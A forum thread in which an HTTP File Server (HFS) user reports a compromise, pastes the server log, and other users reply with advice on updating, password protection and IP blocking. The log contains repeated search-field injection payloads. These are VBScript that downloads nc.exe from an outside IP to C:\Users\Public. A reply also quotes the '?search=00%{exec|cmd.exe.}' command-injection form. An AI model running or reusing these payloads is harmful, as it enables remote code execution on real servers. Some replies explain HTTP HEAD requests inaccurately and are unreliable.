rejetto forum
		Software => HFS ~ HTTP File Server => Topic started by: userhfs on March 09, 2016, 03:10:25 PM
		
			
			- 
				Hello all!
 
 Today my antivirus told me, that trojan was deleted. It was a vbs-script, i've opened it in N++ and here it is on screenshot.
 
 After that i've started try to found, how it happened. And i found it. HFS working on  80 port, and every day i have a lot of messages of "requested GET" and "trying to upload xml". I've opened HFS and saw it (look screenshot).
 
 I've exported full log to txt file and here it is:
 
 9:24:21 150.70.188.172:53306 Requested GET /
 9:31:24 150.70.173.52:45675 Requested GET /
 10:33:11 150.70.188.182:45937 Requested GET /
 12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
 13:10:33 150.70.188.178:57561 Requested GET /
 15:19:09 150.70.188.178:52023 Requested GET /
 15:36:46 150.70.173.43:58891 Requested GET /
 17:06:33 150.70.173.7:48701 Requested GET /
 18:37:18 150.70.188.181:50506 Requested GET /
 19:07:36 150.70.173.57:57074 Requested GET /
 20:01:32 188.138.1.218:42693 Requested GET /
 21:58:16 188.32.198.69:17087 Requested GET /
 14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
 21:34:42 150.70.173.10:54565 Requested GET /
 23:49:04 150.70.188.172:57408 Requested GET /
 0:05:27 150.70.173.8:56183 Requested GET /
 0:35:08 150.70.188.169:41555 Requested GET /
 3:21:10 150.70.188.166:44530 Requested GET /
 4:36:26 150.70.97.86:48072 Requested GET /
 6:51:26 150.70.173.49:34699 Requested GET /
 7:13:12 185.130.5.146:41838 Requested HEAD /
 7:27:38 94.102.49.78:32822 Requested GET /
 10:14:02 95.220.12.221:56833 Requested GET /
 10:14:02 95.220.12.221:56841 Requested GET /
 11:36:21 150.70.188.182:36670 Requested GET /
 11:50:43 150.70.173.55:57792 Requested GET /
 12:54:18 150.70.188.179:46689 Requested GET /
 13:59:29 150.70.173.44:58075 Requested GET /
 14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
 23:53:11 150.70.188.180:38578 Requested GET /
 2:39:02 162.13.170.123:60331 Requested GET /
 14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
 14:14:29 193.124.183.62:59434 Requested GET /
 18:38:16 150.70.188.165:52615 Requested GET /
 0:53:07 150.70.188.180:38067 Requested GET /
 3:02:21 150.70.173.41:58793 Requested GET /
 4:21:49 37.153.173.10:57460 Requested GET /
 5:25:08 185.129.62.62:55354 Requested GET /
 5:45:42 185.65.135.227:54500 Requested GET /
 6:58:03 171.25.193.131:22518 Requested GET /
 9:45:22 150.70.173.5:41667 Requested GET /
 11:56:00 193.124.183.62:50858 Requested GET /
 12:24:58 185.130.5.146:47664 Requested HEAD /
 14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
 16:53:28 163.172.13.21:63567 Requested GET /
 17:53:59 66.240.192.138:51136 Requested GET /
 18:17:14 150.70.188.171:37191 Requested GET /
 21:19:42 159.224.52.241:57673 Requested GET /
 22:04:44 150.70.173.40:58734 Requested GET /
 23:13:02 193.124.183.62:62283 Requested GET /
 0:27:39 162.13.170.123:56872 Requested GET /
 4:04:43 188.32.105.181:65077 Requested GET /
 4:09:21 150.70.173.58:34591 Requested GET /
 5:16:26 77.247.181.162:46931 Requested GET /
 7:49:13 51.254.44.137:41738 Requested GET /
 9:49:22 150.70.188.178:55827 Requested GET /
 10:38:10 193.124.183.62:61670 Requested GET /
 14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
 15:42:55 185.130.5.146:39691 Requested HEAD /
 17:24:32 137.226.113.7:44838 Requested GET /
 19:15:21 193.124.183.62:55358 Requested GET /
 1:46:28 188.138.1.218:59867 Requested GET /
 3:10:43 62.210.162.182:41469 Requested GET /
 3:10:45 62.210.162.182:48773 Requested GET /
 4:50:19 176.10.99.206:60831 Requested GET /
 5:05:30 112.115.19.84:60662 Requested GET /
 5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
 5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
 > xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
 > xHttp.Send
 >
 > with bStrm
 >     .type = 1 '//binary
 >     .open
 >     .write xHttp.responseBody
 >     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
 > end with.}
 5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
 5:58:29 150.70.188.181:42625 Requested GET /
 
 So, what should i do, to prevent same situations? Now i switched off HFS+, but i really need it. Let me know, how to prevent illegal actions. Thanks!
- 
				very strange??
 
 target ip for nc.exe is a HFS web server
 
 vbs script probably come from another source
 
 What you can do is to make a log to file and select  "request dump" and eventually "reply" to obtain more information about connections
 
 if possible block all communication from an to this ip in your firewall
 
 
- 
				VBS script came from HFS+, as you could see, throught HFS vulnerability. Hacker put special command in search field and file has been created on my pc. Is there anyone of admins, or technicians? I guess, tgey should know about that. My fault, that root directory haven't a password. Now, i've protected it by password, so hacker cant access to search field. 2nd step was an update of HFS - from 2.3 to 2.3g.
			
- 
				with the last build you can be reassured, because you were using version 289 that was sensitive to the cmd attack by url with "? search = 00%{exec|cmd.exe.}"
 
 similarly as explain in this post about build 287, build 289 was not protected
 http://www.rejetto.com/forum/bug-reports/uploading-backdor-in-287/msg1060051/#msg1060051
 since hfs 2.3d build 292 the problem is solved,
 
 because I have certain privileges here, it is possible for me to access the home page of your server from your IP, I see that you have made an update of hfs with the latest version, so you no longer risk being injured party in the same attack
 
 you can now rest easy ;)
 
 strangely HFS server complained to the IP address 150.129.217.214 is no longer available
 
 the "hacker" is not a stranger on  the forum
 ;D ;D
- 
				Thanks for your reply! Ok, now i've set password for root directory, and 'search field' now is unavailable. Thanks!
			
- 
				Adn could someone tell me, what does it mean?
 
 14:11:08 127.0.0.1:55616 Upload failed for getstring.xml: Folder not found.
 14:11:08 127.0.0.1:55616 Upload failed getstring.xml
 18:13:23 Check update: no new version
 
- 
				By doing a lookup on that IP address range, it seems that 150.70.*.* (http://whatismyipaddress.com/ip/150.70.173.52) (which appears a lot in your log), it seems to belong to "trendmicro.com" company, in Japan. May be this company was scanning your server, or doing something weird? I don't know, but it doesn't look like an IP address from a normal ISP.
 
 The IP 150.129.217.214 (http://whatismyipaddress.com/ip/150.129.217.214) is from some ISP in China, and may be some attacker. Well, I'm not expert on this, but there is no more public information about who may be behind this (only that Chinese ISP knows who was the end user, if that user wasn't browsing from a public Cybercafe).
- 
				Using this software, you will see what is the process in real time using the address 127.0.0.1 remotely on port 80
 
 unzip and run TCPView.exe, probably you can have an alert from protect sotfware, you can ignore it without risk.
- 
				i'm sorry for this accident, but it's a bad idea to have a server on the internet and not let it update.
 
 
- 
				What is it Requested HEAD / ?
			
- 
				request head is exactly that, just request the url header
 
 in html
 https://www.w3schools.com/tags/tag_header.asp
 <header>
 </header>
 
 is only retrieved here
 
 this would included cooki sid / encryption and other info to what webserver your using and other,
 its normaly to see head request followed by other networking and request
 
 in the white hacker ethical hacking course, this is an atempt to see what is running and what replies with what.
 
 given the hack atempt, i would asume that the request was to see what version of hfs you were runnning with what web client and how they would atmpet a dos atack to your site
 
- 
				 
 Thanks!
 Sent to the ban ip from which was requested head /
 Is it possible to automatically configure such IPs with such a request to be blocked?
 
 
- 
				the higher the number of the port, the harder it will be to reach.
 But FIRST software must be updated.